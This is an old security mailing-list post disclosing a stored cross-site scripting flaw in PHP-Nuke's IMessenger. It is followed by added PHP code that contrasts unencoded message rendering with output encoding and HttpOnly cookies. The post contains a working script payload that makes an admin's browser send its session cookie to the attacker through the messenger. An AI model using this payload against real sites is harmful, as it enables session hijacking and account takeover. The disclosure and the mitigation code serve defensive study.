Security hole in IMessenger ( PHP-Nuke )

From: frog frog (leseulfrogat_private)
Date: Sat Dec 15 2001 - 05:45:29 PST

    There is a big hole in imessenger (im.php). It 
    accepts JavaScript... if I send
    
    <*s*cript>window.location.href='http://www.
    [SERVER].com/im.php?username_to= [MY_NICK] 
    &subject='+ document.cookie 
    +'&message=message&action=send' ;</script>
    
    (without '*') to the admin, he sends his cookie.
    
    PHPNuke has been alerted.
    There's a tut (French) here:
    
    http://balteam.multimania.com/Tuts/imhole.txt
    
    frog-m@n
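
The hole reported above is message content being written into the recipient's page without encoding. The following is an added example, not part of the original post and not PHP-Nuke's own code, showing that pattern beside an encoded rendering; the function names, the message array layout and the cookie name are hypothetical.

```php
<?php
// Added example: hypothetical rendering of a private message; not PHP-Nuke's im.php.

// Vulnerable pattern: sender-controlled fields are written into the HTML as-is,
// so markup in the subject or body runs in the recipient's session.
function render_message_unsafe(array $msg): string
{
    return "<h3>{$msg['subject']}</h3>\n<p>{$msg['message']}</p>\n";
}

// Hardened pattern: encode every sender-controlled field at output time.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_message_safe(array $msg): string
{
    return '<h3>' . h($msg['subject']) . "</h3>\n<p>"
         . nl2br(h($msg['message'])) . "</p>\n";
}

// Defence in depth: an HttpOnly cookie is not exposed through document.cookie.
// Call before any output. Name and value are placeholders (options array: PHP 7.3+).
function issue_session_cookie(string $value): bool
{
    return setcookie('session_placeholder', $value, [
        'path'     => '/',
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
}

// Constructed sample input with a harmless marker in place of a payload.
$msg = [
    'subject' => 'hello',
    'message' => "<script>/* constructed sample */</script>\nsecond line",
];

echo render_message_unsafe($msg); // the script element reaches the browser intact
echo render_message_safe($msg);   // the same bytes are shown as text: &lt;script&gt;...
```

Encoding at output time covers both the subject and the message field, and the HttpOnly flag limits what a missed injection point can read from the admin's session.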
    


